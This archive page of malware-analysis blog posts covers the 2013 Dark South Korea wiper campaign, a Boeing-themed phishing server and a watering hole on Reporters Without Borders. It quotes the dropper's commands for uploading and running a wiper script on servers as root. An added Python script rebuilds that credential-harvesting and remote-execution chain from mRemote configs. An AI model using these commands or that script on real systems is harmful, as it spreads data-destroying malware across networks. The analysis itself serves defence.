Category Archives: Reverse Engineering

Dark South Korea Total War Review

As reported by various media, security vendors and security researchers, several South Korean banks and broadcasters went dark on Wednesday 20 March, victims of a cyber attack. The initially impacted broadcasters were KBS, MBC and YTN, and the impacted banks were Cheju, Nonghyup and Shinhan.

But by analyzing all the events related to this attack, we can see that the campaign extended over a longer period than reported and is also more complex to understand. It is composed of different samples, potentially created by different authors with different objectives. The reported samples can be divided into the following categories:

  • Wipe: the objective of these samples is to erase all data on the affected targets.
  • Drop & Wipe: the objective of these samples is to drop a wiper that erases all data on the affected targets.
  • Drop & Wipe & Deface: the objectives of these samples are to drop a wiper that erases all data and to deface websites hosted by the affected targets.
  • Drop & Backdoor: the objective of these samples is to install a backdoor, or trojan, on the affected targets.
  • Unknown: these samples are potentially not related to the campaign.

Through this blog post I will try to provide you the most reliable information possible regarding the Dark South Korea campaign.

According to several sources, and as announced by the South Korean security vendor AhnLab on Thursday 21 March, the attackers gained access to AhnLab Policy Center (APC) and HAURI ViRobot ISMS, both asset management tools, through stolen credentials, and used them to mass-deploy Trojan.Jokra. But according to the latest news, announced on 29 March, the AhnLab APC product was vulnerable to a login authentication bypass, and this vulnerability is what the attackers used to gain access to APC and spread the malware.

On Wednesday 20 March, AhnLab's stock gained 6.5 percent (from 75,100 KRW to 80,000 KRW) on expectations of demand for online security software following the hacking incident. But after the 21 March AhnLab announcement, the stock was down 3.6 percent (from 80,000 KRW to 74,700 KRW). Since 21 March, AhnLab's stock has fallen from 74,700 KRW to 68,100 KRW.

AhnLab Stocks. Source: Korea Exchange

KCC reported that around 47,800 machines were impacted by this attack. The following graphic summarizes the known impacts. It was inspired by the work of @piyokango, whose blog post is a must read!

Dark-South-Korea-1.1

The associated event timeline, also translated from @piyokango's work, helps to understand all the actors and impacts involved in this attack.

Dark South Korea Events Timeline

Date   Time                   Event
3/20   around 2pm             Financial and broadcasting organizations' computers stop suddenly and cannot be restarted
       2:25pm                 KCC starts receiving incident reports
       2:35pm                 KCC & KISA confirm outages at financial and broadcasting organizations
       2:40pm                 YTN TV reports the incidents
       2:50pm                 South Korean presidency acknowledges the incidents
       3pm                    KISA raises its alert level
       3:05pm                 NongHyup Bank initiates blocking measures
       around 3pm             Shinhan Bank central server is down
       around 3pm             Cyber police announce the possibility of an attack and start the investigation
       3:10pm                 South Korean army raises its alert level
       3:20pm                 Shinhan Bank business recovery
       4:20pm                 NongHyup Bank business recovery
       around 4pm             MBC TV internal network reported as impacted
       around 4pm             Banks extend opening hours past 6pm
       5:49pm                 AhnLab anti-virus engine is updated
       6:40pm                 AhnLab distributes countermeasures
       around 9pm             KBS internal information system reported as impacted
3/21   6:30am                 MBC Gyeongnam TV internal network is stopped
       7:25am                 KBS TV internal network business recovery, except for PCs
       11:30am                KCC chairman visits KISA
       around 5pm             16 NongHyup Bank offices still not able to recover
3/22   around 6am             87% of NongHyup Bank cooperatives and 78% of their ATMs have been recovered
       around 3pm             KCC reports that the China attribution was a mistake
3/24   around 6pm             NongHyup Bank adds some additional countermeasures
                              NongHyup Bank full business recovery
3/25   around 6am             NongHyup Bank segregates its internal and external networks (lol)
       10:30am to 1:45pm      Time-zone-triggered attacks reported and security warning raised by AhnLab
                              International cooperation requested for the investigations
3/26   9:21am                 Additional countermeasures provided by AhnLab
       9:40am                 6 YTN TV affiliates overloaded by traffic
       10:40am                Network overload disrupting 8 municipality websites (Seoul, Gyeonggi, Incheon, Gwangju, Jeonnam, Jeonbuk, Gangwon, Jeju)
       11:22am                Network overload disrupting 7 South Korean regions
       11:50am                Military experts join the public-private incident response task force
       12:04pm                Network failure recovery
       1:40pm to 2:30pm       Daily NK website disrupted and posts deleted
                              Free North Korea TV website disrupted
       2:00pm to 2:15pm       Ministry websites disrupted
       2:30pm to around 5pm   Other North Korean activist websites disrupted
3/27   -                      The Financial Services Commission announces special inspections of the targeted financial institutions
3/28   -                      YTN TV website recovery
3/29   11:09am                AhnLab announces that APC was vulnerable to an authentication bypass weakness
       -                      Response team announces return to normal operations
Source : piyolog (http://d.hatena.ne.jp/Kango/20130323)

The current investigation results indicate that foreign source IPs (in three European countries and the US, but not China) were identified as potential sources of the attack, and that 14 potential variants of the malware were discovered and analyzed.

Security firm Xecure Lab has provided some information regarding Dark South Korea; malware hashes are available together with some detailed analysis. Malware samples were also available in private groups and on contagio. Based on these hashes and samples, you will find an analysis below.

Samples Analysis

Presumed Dropper(s)
MD5: 9263E40D9823AECF9388B64DE34EAE54
Size: 417.5 KB
Compilation timestamp: 2013-03-20 04:07:02
Modify date: None
File mapping object: None
Resource language(s): English & Korean
Strings: N/A
URL: None
Other names: APCRunCmd.DRP / K10

This executable drops "AgentBase.exe" (db4bbdc36a78a8807ad9b15a562515c4), "alg.exe" (e45cd9052dd3dd502685dfd9aa2575ca), "conime.exe" (6a702342e8d9911bde134129542a045b) and "~pr1.tmp" (dc789dee20087c5e1552804492b042cd) into "%TMP%", then executes "AgentBase.exe". Remarks: also known as K10 by Xecure Lab and described there as a wiper, but it is a dropper. This sample could be categorized as Drop & Wipe.

The dropped "AgentBase.exe" is known as K01 by Xecure Lab and described there as a wiper only. "AgentBase.exe" is a Windows wiper, but also the dropper for the *NIX bash wiper "~pr1.tmp". More information in the "9263E40D9823AECF9388B64DE34EAE54 Dropper Analysis" chapter of this post.

MD5: 50E03200C3A0BECBF33B3788DAC8CD46
Size: 24 KB
Compilation timestamp: 2012-07-06 12:24:18
Modify date: None
File mapping object: FFFFFFF-198468CD-6937629023-EF90000000
Resource language(s): None
Strings: hello
URL: hxxp://www.skymom.co.kr/rgboard/addon/update/update_body.jpg
Other names: K06

It seems that "update_body.jpg" (a03ae3a480dd17134b04dbc5e62bf57b), first seen on 2012-08-28 04:31:52, is the same file mentioned on SCUMWARE on 2012-08-30. You can find this sample on malware.lu. Symantec and McAfee have tried to establish a relation based on the packer used and on some common compilation paths. But like McAfee, I don't see any relation between this dropper and the 03.20 Dark South Korea campaign. Known as K06 by Xecure Lab. This sample could be categorized as Drop & Backdoor, or Unknown.

MD5: E4F66C3CD27B97649976F6F0DAAD9032
Size: 24 KB
Compilation timestamp: 2012-07-06 12:24:18
Modify date: None
File mapping object: FFFFFFF-198468CD-6937629023-EF90000000
Resource language(s): None
Strings: hello
URL: hxxp://www.anulaibar.com/e107/e107_files/js/e107_001.cab
Other names: K05

Here too, I don't see any relation between this dropper and the 03.20 Dark South Korea campaign. Known as K05 by Xecure Lab and mentioned by McAfee. This sample could be categorized as Drop & Backdoor, or Unknown.

MD5: 2F9AF723E807FF44C2684E5D644EBE46
Size: 38.8 KB
Compilation timestamp: None
Modify date: 2013:03:17 23:41:07
File mapping object: None
Resource language(s): None
Strings: None
URL: None
Other names: 고객계좌내역.rar / K08

Known as K08 by Xecure Lab, and like the Xecure Lab team, I don't see any relation between this dropper and the 03.20 Dark South Korea campaign. F-Secure has tried to link this sample to the campaign. This sample could be categorized as Unknown.

MD5: 530c95eccdbd1416bf2655412e3dddb
Size: Unknown
Compilation timestamp: Unknown
Modify date: None
File mapping object: Unknown
Resource language(s): Unknown
Strings: HASTATI. / PR!NCPES and other unknowns
URL: Unknown
Other names: Unknown

This sample was mentioned by Symantec and AhnLab on 23 March. Its particularity is that it drops two files and injects one of them into the "LSASS.exe" process as a DLL. It also triggers every year on 20 March at 2pm and wipes the MBR with the "HASTATI." and "PR!NCPES" strings. Unfortunately I wasn't able to find this sample. This sample could be categorized as Drop & Wipe.

MD5: e823221609b37e99fbbce5b493a02f68
Size: 236.0 KB
Compilation timestamp: 2013-03-19 23:57:06
Modify date: None
File mapping object: None
Resource language(s): Korean
Strings: MICRO_ESENCIAL0192301 / Alerter / Sens / Hacked By Whois Team / morpsntls.exe / and a bunch of others
URL: None
Other names: cmsvrts.exe / K07

This sample was also mentioned on 20 March by various media, security vendors and researchers. It was used against LG UPlus Corp, displaying a page saying the site had been hacked by a group calling itself the "Whois Team".

hackedbywhoisteam

A particularity of this sample is that it seems to be triggered only under certain conditions, which appear to be related to a specific time zone, as mentioned by AhnLab on 23 March. The sample drops the "mp.swf", "lf.mp3", "24mhk04.gif" and "25z18pg.jpg" files, creates the "MICRO_ESENCIAL0192301" mutex, modifies registry entries under "SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management", overwrites all ".html", ".htm", ".aspx", ".asp", ".jsp", ".do" and ".php" files with its own code, terminates the Windows Alerter service (Alerter) and the System Event Notification Service (Sens), and wipes the MBR. This sample could be categorized as Drop & Wipe & Deface.

Presumed Wiper(s)

Symantec, Tripwire, Xecure Lab and contagio reported hashes of different wipers. Below is an analysis of these wipers with some corrections.

MD5: 0a8032cd6b4a710b1771a080fa09fb87
Size: 24 KB
Compilation timestamp: 2013-01-31 10:27:18
File mapping object: JO840112-CRAS8468-11150923-PCI8273V
Strings: PR!NCPES / HASTATI. / \Temp\~v3.log
Checks "~v3.log": No
Task kill: pasvc.exe (AhnLab Policy Agent) / clisvc.exe (Hauri ViRobot)
Wiper timing: Immediate
Shutdown: shutdown -r -t 0
Other names: mb_join.gif / mb_join.exe / K03
Mentioned by: contagio & Symantec

Even when the "~v3.log" file is present in the "C:\WINDOWS\Temp\" directory, this wiper runs immediately. This sample could be categorized as Wipe.

MD5: 5fcd6e1dace6b0599429d913850f0364
Size: 24 KB
Compilation timestamp: 2013-01-31 10:27:18
File mapping object: JO840112-CRAS8468-11150923-PCI8273V
Strings: HASTATI.
Checks "~v3.log": No
Task kill: pasvc.exe (AhnLab Policy Agent) / clisvc.exe (Hauri ViRobot)
Wiper timing: Immediate
Shutdown: shutdown -r -t 0
Other names: AmAgent.exe / OthDown.exe / K04
Mentioned by: contagio & Symantec & Tripwire

This sample could be categorized as Wipe.

MD5: db4bbdc36a78a8807ad9b15a562515c4
Size: 24 KB
Compilation timestamp: 2013-01-31 10:27:18
File mapping object: JO840112-CRAS8468-11150923-PCI8273V
Strings: PRINCPES / HASTATI. / \Temp\~v3.log
Checks "~v3.log": Yes
Task kill: pasvc.exe (AhnLab Policy Agent) / clisvc.exe (Hauri ViRobot)
Wiper timing: Not immediate if ~v3.log is present
Shutdown: shutdown -r -t 0
Other names: ApcRunCmd.exe / K01
Mentioned by: contagio & Symantec & Tripwire

This sample checks for the presence of "~v3.log" in the "C:\WINDOWS\Temp\" directory. If the file is present, the wipe process is not started. This sample could be categorized as Wipe.


But keep in mind that this sample is normally executed by the 9263E40D9823AECF9388B64DE34EAE54 dropper; the complete process is analyzed in the "9263E40D9823AECF9388B64DE34EAE54 Dropper Analysis" chapter of this post.

MD5: f0e045210e3258dad91d7b6b4d64e7f3
Size: 24 KB
Compilation timestamp: 2013-01-31 10:27:18
File mapping object: JO840112-CRAS8468-11150923-PCI8273V
Strings: PRINCPES / HASTATI. / \Temp\~v3.log
Checks "~v3.log": Yes
Task kill: pasvc.exe (AhnLab Policy Agent) / clisvc.exe (Hauri ViRobot)
Wiper timing: Not immediate if ~v3.log is present
Shutdown: shutdown -r -t 0
Other names: ApcRunCmd.exe / K02
Mentioned by: contagio

Like the previous wiper, if "~v3.log" is present in the "C:\WINDOWS\Temp\" directory, the wipe process is not started.


This sample also seems to be part of another dropper that is not publicly known at the moment. This sample could be categorized as Wipe.

As you can see, all of the wipers use the "HASTATI" string to overwrite the MBR. As reported by security vendors, "Hastati" refers to a class of infantry in the armies of the early Roman Republic. "PRINCPES", also used to overwrite the MBR, could refer to the "Principes", the veteran soldiers of the pre-Marian Roman army. Are the attackers fans of the Roman army, or of the Total War game?

Another interesting relation with the "HASTATI" string used to overwrite the MBR: the KBS TV website was defaced on 21 March with a "Defaced by HASTATI" message and a symbol representing that class of infantry of the early Roman Republic.

defacedbyhastati
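The wiper tables above boil down to a handful of static indicators: the PE compilation timestamp shared by K01 to K04, the "HASTATI." / "PR!NCPES" / "PRINCPES" MBR markers, the "\Temp\~v3.log" inhibitor path, the pasvc.exe / clisvc.exe kill list and the Whois mutex. The following triage script is an added example written for this page (not the author's tooling, not the malware): it decodes the COFF TimeDateStamp of a PE file, reports which of those indicators are present and assigns the page's own categories. The `build_fake_pe` helper fabricates a minimal MZ/PE header purely so the script can be exercised on a constructed blob; only the indicator strings are taken from the page.

```python
"""Static triage for the Dark South Korea wiper family (added example)."""
import struct
from datetime import datetime, timezone

# Indicator strings quoted on this page, grouped by what they tell an analyst.
MBR_MARKERS = [b"HASTATI.", b"PR!NCPES", b"PRINCPES"]
INHIBITOR = [b"\\Temp\\~v3.log"]                 # wipe is skipped when this file exists
AV_KILL = [b"pasvc.exe", b"clisvc.exe"]          # AhnLab Policy Agent / Hauri ViRobot
WHOIS_MARKS = [b"MICRO_ESENCIAL0192301", b"Hacked By Whois Team"]


def pe_timestamp(data):
    """Return the COFF header TimeDateStamp as an aware UTC datetime, or None."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 12 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    # COFF header after the PE signature: Machine(2) NumberOfSections(2) TimeDateStamp(4) ...
    (ts,) = struct.unpack_from("<I", data, e_lfanew + 8)
    return datetime.fromtimestamp(ts, tz=timezone.utc)


def find_indicators(data):
    """Map each indicator group to the markers actually present in the bytes."""
    groups = {"mbr_markers": MBR_MARKERS, "inhibitor": INHIBITOR,
              "av_kill": AV_KILL, "whois": WHOIS_MARKS}
    return {name: [m.decode() for m in marks if m in data]
            for name, marks in groups.items()}


def classify(hits):
    """Apply the page's categories to the indicator hits."""
    if hits["whois"]:
        return "Drop & Wipe & Deface"
    if hits["mbr_markers"]:
        return "Wipe"
    return "Unknown"


def triage(data):
    hits = find_indicators(data)
    ts = pe_timestamp(data)
    return {
        "compiled": ts.strftime("%Y-%m-%d %H:%M:%S") if ts else None,
        "hits": hits,
        "category": classify(hits),
        # K03/K04 never reference ~v3.log and therefore wipe unconditionally.
        "checks_v3log": bool(hits["inhibitor"]),
    }


def build_fake_pe(timestamp, payload):
    """Constructed stand-in for a sample: minimal MZ/PE headers plus raw strings."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, timestamp, 0, 0, 0, 0x102)
    return dos + coff + payload


if __name__ == "__main__":
    import sys
    with open(sys.argv[1], "rb") as fh:
        print(triage(fh.read()))
```

Run it as `python triage.py sample.bin`; a 24 KB sample reporting `2013-01-31 10:27:18` with the MBR markers but no inhibitor path is the K03/K04 shape, while the same timestamp with the inhibitor path matches K01/K02.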

9263E40D9823AECF9388B64DE34EAE54 Dropper Analysis

In this chapter of this long blog post we will analyze some behaviors of the 9263e40d9823aecf9388b64de34eae54 dropper.

As mentioned by various security vendors and researchers, when executed the dropper extracts four files into the Windows "%TMP%" directory: "alg.exe", "conime.exe", "~pr1.tmp" and "AgentBase.exe".

dropped-files

"alg.exe" (e45cd9052dd3dd502685dfd9aa2575ca) is the PuTTY "plink.exe" tool, a command-line interface to the PuTTY back ends. This binary was compiled on 2013-02-15 at 08:12:58.

"conime.exe" (6a702342e8d9911bde134129542a045b) is the PuTTY "pscp.exe" tool, an SCP client, i.e. command-line secure file copy. This binary was compiled on 2006-03-13 at 14:32:44.

"~pr1.tmp" (dc789dee20087c5e1552804492b042cd) is a bash script that is dropped and executed on *NIX servers under certain conditions.

"AgentBase.exe" (db4bbdc36a78a8807ad9b15a562515c4) is the wiper described in the previous chapters of this post.

After dropping these files, the dropper checks for the presence of the "~v3.log" file in the "C:\WINDOWS\Temp\" directory.

If "~v3.log" does not exist, the "AgentBase.exe" wiper is executed: it kills the AhnLab Policy Agent (pasvc.exe) and the Hauri ViRobot ISMS client (clisvc.exe), then erases all data.

If "~v3.log" exists, the dropper checks for the presence of the "confCons.xml" configuration file of the mRemote program, developed by Felix Deimel, and of the configuration files of the SecureCRT program, developed by VanDyke Software, Inc.

program-presence-check

For mRemote, the dropper copies all data related to SSH connections with a root login from the "confCons.xml" configuration file and exploits a weakness in the program's password storage. When you save connections in mRemote, all of that data is written to the "confCons.xml" XML file. The passwords are stored in an encrypted format, but this is trivial to circumvent, so despite being encrypted they are easy to decrypt. This weakness was discovered and published by Cosine Security on 2 June 2011. Support for mRemote was discontinued in 2012.

Once the mRemote passwords are recovered, the dropper starts a new process running the "conime.exe" binary in order to upload the "~pr1.tmp" file as "/tmp/cups" on the targeted server:

C:\Users\ERICRO~1\AppData\Local\Temp\conime.exe  -batch -P 22 -l root -pw test C:\Users\ERICRO~1\AppData\Local\Temp\~pr1.tmp 192.168.178.54:/tmp/cups

After the upload of the "cups" file, the dropper executes it with the following command:

C:\Users\ERICRO~1\AppData\Local\Temp\conime.exe  -batch -P 22 -l root -pw test 192.168.178.54 "chmod 755 /tmp/cups;/tmp/cups"

For SecureCRT, the dropper likewise copies all data related to SSH connections with a root login from the "*.ini" configuration files. Each saved connection in SecureCRT has its own "*.ini" file, which the dropper parses. The passwords are also stored in an encrypted format.

SecureCRT-Config-fILES

With the latest version of SecureCRT (7.0.3), the dropper is unable to decrypt the password, but still tries to connect to the targeted servers with a wrong password. So there is surely a similar weakness in previous versions of SecureCRT, but I wasn't able to find it.
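The decision chain described in this chapter (the "~v3.log" inoculation check, the harvesting of root SSH entries from mRemote's confCons.xml, then the pscp upload and remote execution of "~pr1.tmp" as /tmp/cups) is reproduced below as an added example written for this page; it is neither the dropper's code nor anything from mRemote. The confCons.xml fragment is constructed, using the Node attributes of mRemote's format (Type, Protocol, Port, Hostname, Username, Password), and password decryption is deliberately left out: the harvested Password attribute is returned exactly as stored. One detail differs from the command lines quoted above: both show conime.exe, but remote command execution is plink's job, not pscp's, so the example runs the second step through alg.exe (plink) as the file mapping earlier in this chapter implies.

```python
"""Emulates the dropper's target selection and lateral-movement commands (added example)."""
import os
import shlex
import xml.etree.ElementTree as ET

# Constructed confCons.xml fragment; attribute names follow mRemote's format.
SAMPLE_CONFCONS = """<?xml version="1.0" encoding="utf-8"?>
<Connections Name="Connections" Export="False" ConfVersion="1.3">
  <Node Name="web01" Type="Connection" Protocol="SSH2" Port="22"
        Hostname="192.168.178.54" Username="root" Password="ENC1"/>
  <Node Name="db01" Type="Connection" Protocol="SSH2" Port="2222"
        Hostname="10.0.0.9" Username="dba" Password="ENC2"/>
  <Node Name="rdp01" Type="Connection" Protocol="RDP" Port="3389"
        Hostname="10.0.0.10" Username="root" Password="ENC3"/>
  <Node Name="Servers" Type="Container">
    <Node Name="app01" Type="Connection" Protocol="SSH2" Port="22"
          Hostname="app01.local" Username="root" Password="ENC4"/>
  </Node>
</Connections>
"""


def inoculated(windows_temp):
    """The wiper path is skipped when ~v3.log exists (the page's observation)."""
    return os.path.exists(os.path.join(windows_temp, "~v3.log"))


def harvest_root_ssh(confcons_xml):
    """Return (host, port, stored_password) for every SSH2 node saved with a root login.
    Containers nest Nodes, so the whole tree is walked rather than only the top level."""
    root = ET.fromstring(confcons_xml)
    targets = []
    for node in root.iter("Node"):
        if node.get("Type") != "Connection":
            continue
        if node.get("Protocol") != "SSH2" or node.get("Username") != "root":
            continue
        targets.append((node.get("Hostname"), int(node.get("Port", "22")),
                        node.get("Password", "")))
    return targets


def lateral_move_commands(tmp_dir, host, port, password):
    """pscp (conime.exe) uploads ~pr1.tmp as /tmp/cups, then plink (alg.exe) runs it."""
    pscp = os.path.join(tmp_dir, "conime.exe")
    plink = os.path.join(tmp_dir, "alg.exe")
    script = os.path.join(tmp_dir, "~pr1.tmp")
    upload = [pscp, "-batch", "-P", str(port), "-l", "root", "-pw", password,
              script, f"{host}:/tmp/cups"]
    execute = [plink, "-batch", "-P", str(port), "-l", "root", "-pw", password,
               host, "chmod 755 /tmp/cups;/tmp/cups"]
    return upload, execute


def plan(windows_temp, tmp_dir, confcons_xml):
    """Return what the dropper would do: wipe, or the list of commands it would run."""
    if not inoculated(windows_temp):
        return {"action": "wipe", "commands": []}
    cmds = []
    for host, port, pw in harvest_root_ssh(confcons_xml):
        cmds.extend(lateral_move_commands(tmp_dir, host, port, pw))
    return {"action": "harvest", "commands": cmds}


if __name__ == "__main__":
    result = plan(r"C:\WINDOWS\Temp", r"C:\Users\x\AppData\Local\Temp", SAMPLE_CONFCONS)
    print(result["action"])
    for c in result["commands"]:
        print(shlex.join(c))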

Boeing-job.com Campaign and Adobe Flash 0days Additional Informations

On 7 February, Adobe issued security bulletin APSB13-04 for Adobe Flash Player to address two vulnerabilities, CVE-2013-0633 and CVE-2013-0634, exploited in the wild.

CVE-2013-0633 (CVSS base score 9.3) is exploited by tricking a Windows user into opening a Microsoft Word document containing malicious Flash content. CVE-2013-0634 (CVSS base score 9.3) is exploited by tricking an Apple OS X user into opening a web page containing malicious Flash content with Firefox or Safari, but it is also exploited by tricking a Windows user into opening a Microsoft Word document containing malicious Flash content.

Affected products are:

  • Adobe Flash Player 11.5.502.146 and earlier versions for Windows and Macintosh
  • Adobe Flash Player 11.2.202.261 and earlier versions for Linux
  • Adobe Flash Player 11.1.115.36 and earlier versions for Android 4.x
  • Adobe Flash Player 11.1.111.31 and earlier versions for Android 3.x and 2.x

These vulnerabilities were discovered being exploited in the wild:

  • For CVE-2013-0633, by Sergey Golovanov and Alexander Polyakov of Kaspersky Lab
  • For CVE-2013-0634, by Shadowserver Foundation, MITRE and Lockheed Martin CIRT

As described by AlienVault Labs and FireEye, the vulnerabilities were exploited through spear-phishing emails targeting several industries, including aerospace. One of the attached files used the 2013 IEEE Aerospace Conference schedule as a lure, and another reported sample was related to the online payroll system of the US company ADP.

Detailed analyses have been provided by AlienVault Labs, FireEye and Malware Must Die. All of them reported the domain name ieee[.]boeing-job[.]com as C&C server.

The boeing-job[.]com domain name was registered on 22 January 2013 through GoDaddy, with fake registration information.

On 5 February the http://ieee[.]boeing-job[.]com sub-domain was pointing to IP 108.62.10.13, AS15003 in the US.
On 6 February http://boeing-job[.]com was pointing to IP 184.168.221.37, AS26496 in the US, a GoDaddy parking page.

But, there is always a but: if you take a look in Google you can find the IP address that was used for www.boeing-job[.]com.

google-www.boeing-job.com

This sub-domain was pointing to a legitimate website, http://www[.]grupo-gestion[.]com[.]ar, IP 200.123.160.138, AS16814 in Argentina.

By searching on urlQuery, you can find a submission from 5 February with this IP. And surprise: this submission concerns a "record.doc" document located in an "/adp/" directory. So we have the ADP Word document. urlQuery also reports an alert, "FILE-OFFICE Microsoft Office Word with embedded Flash file transfer", for the "record.doc" document.

Now let's analyze further the server used in the spear-phishing campaign. With some Google searches, you will quickly find that weak tools are present on the server and that they are freely accessible from the Internet. After some further analysis, we can see that an old default XAMPP installation is present on this server and that the attackers used this weakness to install a PHP backdoor. The PHP backdoor was also not protected, giving full access to the server.

The "/adp/" directory no longer contains the "record.doc" file, and most of the server seems to have been cleaned.

But I discovered an interesting "/jobs/" directory containing a well-known tool, the JSbug statistics backend, used in previous drive-by attack campaigns. The contents of the backend show that a campaign using the www.boeing-job[.]com domain name had been running since 22 January.

jsbug-backend

Also interesting: the XAMPP Apache log files were accessible from the Internet without any restriction.

Some log analysis yields the following information:

  • The "record.doc" file size was 563,200 bytes.
  • The first access to "/adp/record.doc" with a 200 Apache return code was recorded on 05/Feb/2013:07:12:24 -0300.
  • "/adp/record.doc" was removed from the server around 08/Feb/2013 09:23:24 -0300.
  • Around 300 accesses to "record.doc" were recorded during this timeframe: 42 on 5 February, 7 on 6 February, 89 on 7 February and 161 on 8 February.
  • A PHP backdoor had been present on the server since 05/Nov/2012 and was used multiple times.
  • A second PHP backdoor was uploaded to the server on 8 February, at 08/Feb/2013 02:25:25 -0300 (surely used to remove the record.doc file). Why not use the first PHP backdoor? Surely because you are not the person who deposited the "record.doc" file and you don't know about the first PHP backdoor.
  • The server was scanned for two days with Acunetix, starting 02/Feb/2013 18:25:45 -0300.
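The bullets above are the kind of facts that fall out of an exposed Apache access log once it is parsed. The script below is an added example written for this page (not the author's tooling) that does that parsing: it reads combined-format lines, then reports for a chosen path the size served, the first successful download, the first 404 after the last download (the removal time), the per-day download count, and the source IPs whose User-Agent carries a scanner marker. The log lines embedded in it are constructed to exercise the code and do not reproduce the real server's traffic or the page's counts.

```python
"""Apache combined-log mining for a lure document (added example)."""
import re
from collections import Counter
from datetime import datetime

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)(?: "(?P<ref>[^"]*)" "(?P<ua>[^"]*)")?')

# Constructed sample log: one scanner probe, three downloads, one later upload,
# then a 404 once the lure has been removed.
SAMPLE_LOG = """\
1.2.3.4 - - [02/Feb/2013:18:25:45 -0300] "GET /adp/ HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Acunetix)"
10.9.8.7 - - [05/Feb/2013:07:12:24 -0300] "GET /adp/record.doc HTTP/1.1" 200 563200 "-" "Mozilla/4.0 (compatible; MSIE 8.0)"
10.9.8.8 - - [05/Feb/2013:09:40:01 -0300] "GET /adp/record.doc HTTP/1.1" 200 563200 "-" "Mozilla/4.0 (compatible; MSIE 8.0)"
10.9.8.9 - - [07/Feb/2013:11:02:13 -0300] "GET /adp/record.doc HTTP/1.1" 200 563200 "-" "Wget/1.12"
10.9.8.9 - - [08/Feb/2013:02:25:25 -0300] "POST /upload/shell2.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
10.9.8.10 - - [08/Feb/2013:09:23:24 -0300] "GET /adp/record.doc HTTP/1.1" 404 208 "-" "curl/7.29"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    rec["size"] = None if rec["size"] == "-" else int(rec["size"])
    return rec


def access_report(log_text, path):
    """Summarise requests for one path the way the bullet list above does."""
    recs = [r for r in map(parse_line, log_text.splitlines()) if r]
    hits = [r for r in recs if r["path"] == path]
    ok = [r for r in hits if r["status"] == 200]
    last_ok = ok[-1]["ts"] if ok else None
    # First 404 after the last successful download approximates the removal time.
    removed = next((r["ts"] for r in hits
                    if r["status"] == 404 and last_ok and r["ts"] > last_ok), None)
    return {
        "sizes": sorted({r["size"] for r in ok}),
        "first_200": ok[0]["ts"] if ok else None,
        "removed_after": removed,
        "total_200": len(ok),
        "per_day": dict(Counter(r["ts"].strftime("%Y-%m-%d") for r in ok)),
    }


def scanner_ips(log_text, marker="Acunetix"):
    """Source IPs whose User-Agent carries a scanner marker, with first-seen time."""
    first = {}
    for r in map(parse_line, log_text.splitlines()):
        if r and r["ua"] and marker in r["ua"]:
            first.setdefault(r["ip"], r["ts"])
    return first


if __name__ == "__main__":
    print(access_report(SAMPLE_LOG, "/adp/record.doc"))
    print(scanner_ips(SAMPLE_LOG))
```

Point it at a real access.log by replacing SAMPLE_LOG with the file contents; the per-day counter only counts 200 responses, so partial transfers (206) and HEAD probes need their own filter if you care about them.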

Additional analysis of the discovered "/jobs/" directory and JSbug backend provides the following interesting information:

  • The "/jobs/" directory was first seen on 22/Jan/2013 06:12:44 -0300.
  • The JSbug backend was installed on 22/Jan/2013 06:13:16 -0300.
  • Additional files were installed in the "/jobs/" directory: "img/jquery-1.8.3.min.js", "img/logo.gif", "check.php", "download.htm", "download.php", "img/download.css", "img/ff_step1.png", "img/ie_step3.png", "img/ff_step2.png" and "NProtect.exe". "check.php", "download.htm", "NProtect.exe" and "download.php" are no longer present on the server.

By analyzing the files remaining on the server from the previous attack, which started on 22 January, we can see files revealing that a spear-phishing campaign was run against Boeing employees to trick them into installing the "NProtect.exe" malware.

logo file found on the server
Step 1 for NProtect.exe installation
Step 2 for NProtect.exe installation
Step 3 for NProtect.exe installation

Reporters Without Borders Victim of Watering Hole Campaign

As mentioned by Jindrich on Twitter, it seems that the entity or entities behind the watering hole attacks don't care about being caught or detected, nor whether the Internet Explorer and Java vulnerabilities are patched. They act as opportunists and take advantage of the window between a patch release and its application by users, companies and non-governmental organizations.

Last week Jindrich Kubec and I reported on watering hole attacks against multiple high-value websites, including for example major Hong Kong political parties. These websites exploited the latest Internet Explorer vulnerability (CVE-2012-4792), patched in MS13-008, and also the latest Java vulnerability (CVE-2013-0422), patched in Oracle Java 7 Update 11.

It seems that one week later, Reporters Without Borders, a France-based international non-governmental organization that advocates freedom of the press and freedom of information, is the latest website used in the watering hole campaign. Such an organization is an ideal target for a watering hole campaign, as right now the miscreants seem to concentrate only on human rights and political sites: many Tibetan, some Uyghur, and some political parties in Hong Kong and Taiwan, the latest hits in this operation. In our opinion the finger could safely be pointed at China (again).

As with the Hong Kong political party, the English version of the RWB site was including a JavaScript file from "hxxp://en.rsf.org/local/cache-js/m.js".

rsf-en-m.js-file

rsf-en-traffic

The "m.js" file creates a cookie named "Somethingbbbbb" with a one-day expiration. The cookie name can be linked to the Hong Kong political party "m.js" cookie, which was named "Somethingeeee". This kind of cookie was already used two years ago in similar attacks with different exploits.

If Internet Explorer 8 is used, an iframe is loaded from "hxxp://newsite.acmetoy.com/m/d/pdf.html". Otherwise two iframes load "hxxp://98.129.194.210/CFIDE/debug/includes/java.html" and "hxxp://newsite.acmetoy.com/m/d/javapdf.html".

newsite.acmetoy.com analysis

The "newsite.acmetoy.com" website hosts the following CVE-2012-4792 related files:

  • "pdf.html" (ffe715a312a488daf3310712366a5024): traditional "DOITYOUR" obfuscated JavaScript file which attempts to exploit the latest Internet Explorer vulnerability, CVE-2012-4792.
  • "logo1229.swf" (da0287b9ebe79bee42685510ac94dc4f): traditional "DOITYOUR" variant of "today.swf".
